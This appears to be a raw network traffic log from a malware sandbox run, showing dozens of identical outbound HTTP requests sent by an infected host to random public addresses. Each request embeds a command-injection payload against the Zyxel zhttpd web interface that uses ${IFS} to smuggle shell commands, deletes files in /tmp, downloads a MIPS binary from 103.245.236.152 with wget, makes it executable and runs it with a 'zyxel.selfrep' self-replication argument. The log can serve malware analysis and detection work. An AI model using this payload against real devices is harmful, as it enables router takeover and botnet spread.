                                          Jan 14, 2024 15:46:33.383399963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8678192.168.2.233715658.189.138.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383454084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8679192.168.2.235657489.31.7.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383476019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8680192.168.2.235152613.130.168.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383492947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8681192.168.2.2357994115.30.90.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383528948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8682192.168.2.2337388189.150.235.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383546114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8683192.168.2.2357608139.233.56.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383577108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8684192.168.2.233987893.56.159.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383603096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8685192.168.2.2354260114.209.115.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383606911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8686192.168.2.2355678114.190.52.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383645058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8687192.168.2.2358156108.148.8.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383678913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8688192.168.2.234233251.119.154.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383696079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8689192.168.2.2359196146.4.57.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386293888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8690192.168.2.2346694106.216.229.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386308908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8691192.168.2.234991260.143.145.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386357069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8692192.168.2.2352636143.155.139.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386399031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8693192.168.2.233378688.104.157.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386425018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8694192.168.2.235089453.187.111.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386451960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8695192.168.2.2359102188.73.195.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386471033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8696192.168.2.2347376133.57.186.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386493921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8697192.168.2.235523884.254.197.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386548042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8698192.168.2.2343438211.184.207.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386591911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8699192.168.2.2334080108.35.177.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386634111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8700192.168.2.2353532164.58.214.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.386657000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8701192.168.2.2337728150.10.178.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396261930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8702192.168.2.2350820211.72.195.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396286011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8703192.168.2.233368099.7.133.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396336079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8704192.168.2.2356082139.243.12.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396361113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8705192.168.2.235251093.42.71.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396439075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8706192.168.2.2359136216.22.213.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396486998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8707192.168.2.2336990118.89.93.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396534920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8708192.168.2.2337330158.88.241.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396584988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8709192.168.2.2350494162.87.210.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396610975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8710192.168.2.234861262.5.66.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396661997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8711192.168.2.2338080188.141.110.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396702051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8712192.168.2.2360286126.187.173.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396768093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8713192.168.2.234096051.168.64.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396785021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8714192.168.2.2356594175.251.190.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396814108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8715192.168.2.233964427.129.73.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396826982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8716192.168.2.234647890.249.56.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396878958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8717192.168.2.234239295.226.169.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396919012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8718192.168.2.2349800209.42.221.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.396939039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8719192.168.2.233727219.137.202.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397011995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8720192.168.2.235738471.178.6.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397033930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8721192.168.2.233429464.111.127.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397077084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8722192.168.2.2343104112.253.239.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397133112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8723192.168.2.2352308159.15.242.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397162914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8724192.168.2.2336666107.115.242.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397203922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8725192.168.2.2335552190.140.84.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397255898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8726192.168.2.234733837.210.20.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397264957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8727192.168.2.235402898.36.178.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397321939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8728192.168.2.235093058.59.210.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397361994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8729192.168.2.2338534148.165.1.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397422075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8730192.168.2.2334088207.48.226.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397454023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8731192.168.2.235893624.28.152.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397488117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8732192.168.2.235570083.202.163.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397550106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8733192.168.2.2355824183.1.6.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397572994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8734192.168.2.234087668.230.149.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397620916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8735192.168.2.2346856198.116.113.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397670984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8736192.168.2.233794270.209.207.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397706032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8737192.168.2.235888632.30.183.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397731066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8738192.168.2.2344026185.218.41.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397770882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8739192.168.2.2341908172.86.1.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397795916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8740192.168.2.235015885.196.163.194443
                                          TimestampBytes transferredDirectionData
